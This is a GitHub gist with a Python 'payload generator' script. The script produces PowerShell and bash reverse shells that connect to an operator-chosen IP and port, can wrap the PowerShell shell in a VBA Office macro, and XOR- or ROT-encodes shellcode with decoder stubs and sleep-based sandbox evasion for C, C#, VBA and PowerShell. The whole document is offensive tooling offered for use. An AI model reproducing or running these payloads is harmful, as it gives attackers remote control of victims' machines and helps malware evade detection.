Skip to content

Instantly share code, notes, and snippets.

@jakobfriedl

jakobfriedl/generator.py

Last active August 5, 2024 07:03
Show Gist options
  • Save jakobfriedl/7e1aca7228671271f1a4f86c9fd7a53e to your computer and use it in GitHub Desktop.
Save jakobfriedl/7e1aca7228671271f1a4f86c9fd7a53e to your computer and use it in GitHub Desktop.
Download ZIP
Generate payloads (reverse shell, macro, shellcode, ...)
Raw
generator.py
#!/usr/bin/env python3
# Author: Jakob Friedl
# Description: Generate payloads
import sys
import argparse
import base64
parser = argparse.ArgumentParser(description="Payload generator v1")
# parser.add_argument('type', help='Type of payload to use.', choices=['revshell', 'shellcode'])
subparsers = parser.add_subparsers(dest='type', required=True)
parser_revshell = subparsers.add_parser('revshell')
parser_revshell.add_argument('--ip', required=True, help='IP address for the reverse shell payload.')
parser_revshell.add_argument('--port', required=True, help='Port for the reverse shell payload.')
parser_revshell.add_argument('--format', required=True, help='Output format of the reverse shell payload.', choices=['ps1', 'bash'])
parser_revshell.add_argument('-m', '--macro', action='store_true', help='Output in VBA Office macro format.')
parser_shellcode = subparsers.add_parser('shellcode')
parser_shellcode.add_argument('--file', required=True, help='Shellcode file.')
parser_shellcode.add_argument('--xor', help='XOR the shellcode with a key byte.', type=int)
parser_shellcode.add_argument('--rot', help='Rotate the bytes in the shellcode.', type=int)
parser_shellcode.add_argument('--sleep', help='Sleep for a given number of seconds.', type=float)
parser_shellcode.add_argument('--format', required=True, help='Output format of the reverse shell payload.', choices=['vba', 'c', 'csharp', 'ps1', 'bin'])
def format_c(shellcode):
result = 'unsigned char buf[] = {\n '
i = 0
for byte in shellcode:
result += '0x%0.2X' % byte + ','
i += 1
if i % 10 == 0:
result += '\n '
return result[:-1] + '};'
def format_csharp(shellcode):
result = 'byte[] buf = new byte[%d] {\n ' % len(shellcode)
i = 0
for byte in shellcode:
result += '0x%0.2X' % byte + ','
i += 1
if i % 10 == 0:
result += '\n '
return result[:-1] + '};'
def format_vba(shellcode):
result = 'Dim buf as Variant\nbuf = Array('
i = 0
for byte in shellcode:
result += '%d' % byte + ','
i += 1
if i % 40 == 0:
result += ' _\n'
return result[:-1] + ')'
def xor_c(key):
return '''
for (int i = 0; i < (int)sizeof(buf) - 1; i++)
{
buf[i] = buf[i]^%d;
}''' % key
def rot_c(rot_num):
return '''
for (int i = 0; i < (int)sizeof(buf); i++)
{
buf[i] =(buf[i] - %d) & 0xFF;
}''' % rot_num
def xor_vba(key):
return '''
Dim i As Integer
For i = LBound(buf) to UBound(buf)
buf(i) = buf(i) Xor %d
Next i''' % key
def rot_vba(rot_num):
return '''
Dim data As Long
Dim counter As Integer
For counter = LBound(buf) To UBound(buf)
data = buf(counter) - %d
res = RtlMoveMemory(addr + counter, data, 1)
Next counter''' % rot_num
def sleep_vba(time):
return '''
Dim t1 As Date
Dim t2 As Date
Dim time As Long
t1 = Now()
Sleep (%d)
t2 = Now()
time = DateDiff("s", t1, t2)
If time < %d Then
Exit Function
End If''' % (time*1000, time)
def rot_csharp(rot_num):
return '''
for (int i = 0; i < buf.Length; i++)
{
buf[i] = (byte)(((uint)buf[i] - %d) & 0xFF);
}''' % rot_num
def sleep_csharp(time):
return '''
DateTime t1 = DateTime.Now;
Sleep(%d);
double t2 = DateTime.Now.Subtract(t1).TotalSeconds;
if(t2 < %d)
{
return;
}''' % (time * 1000, time)
def xor(shellcode, args):
return [(byte ^ args.xor) for byte in shellcode]
def rot(shellcode, args):
if args.format == 'vba':
return [(byte + args.rot) for byte in shellcode]
else:
return [(byte + args.rot) & 0xFF for byte in shellcode]
def print_timedelay(args):
if args.format == 'vba':
print(sleep_vba(args.sleep))
if args.format == 'csharp':
print(sleep_csharp(args.sleep))
def print_shellcode(payload, format):
if format == 'c':
print(format_c(payload))
if format == 'csharp':
print(format_csharp(payload))
if format == 'vba':
print(format_vba(payload))
def print_decoders(args):
if args.format == 'vba':
if args.xor != None:
print(xor_vba(args.xor))
if args.rot != None:
print(rot_vba(args.rot))
if args.format == 'c':
if args.xor != None:
print(xor_c(args.xor))
if args.rot != None:
print(rot_c(args.rot))
if args.format == 'csharp':
if args.rot != None:
print(rot_csharp(args.rot))
# Powershell reverse shell payload
def revshell():
if args.format == 'ps1':
payload = '$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
payload = payload % (args.ip, int(args.port))
# Encode payload as base64 string
cmdline = "powershell -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()
if args.macro:
# Line length
n = 50
print("Dim Str as String")
for i in range(0, len(cmdline), n):
print("Str = Str + " + '"' + cmdline[i:i+n] + '"')
print('CreateObject("Wscript.Shell").Run Str')
return
if args.format == 'bash':
payload = "bash -c 'bash -i >& /dev/tcp/%s/%d 0>&1'" % (args.ip, int(args.port))
cmdline = "echo " + base64.b64encode(payload.encode('utf16')[2:]).decode() + " | base64 -d | bash"
print(cmdline)
# Shellcode payload
def shellcode():
with open(args.file, mode='rb') as file:
payload = file.read()
if args.rot != None:
payload = rot(payload, args)
if args.xor != None:
payload = xor(payload, args)
if args.sleep != None:
print_timedelay(args)
print_shellcode(payload, args.format)
print_decoders(args)
if __name__ == '__main__':
args = parser.parse_args()
if args.type == 'revshell':
revshell()
elif args.type == 'shellcode':
shellcode()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment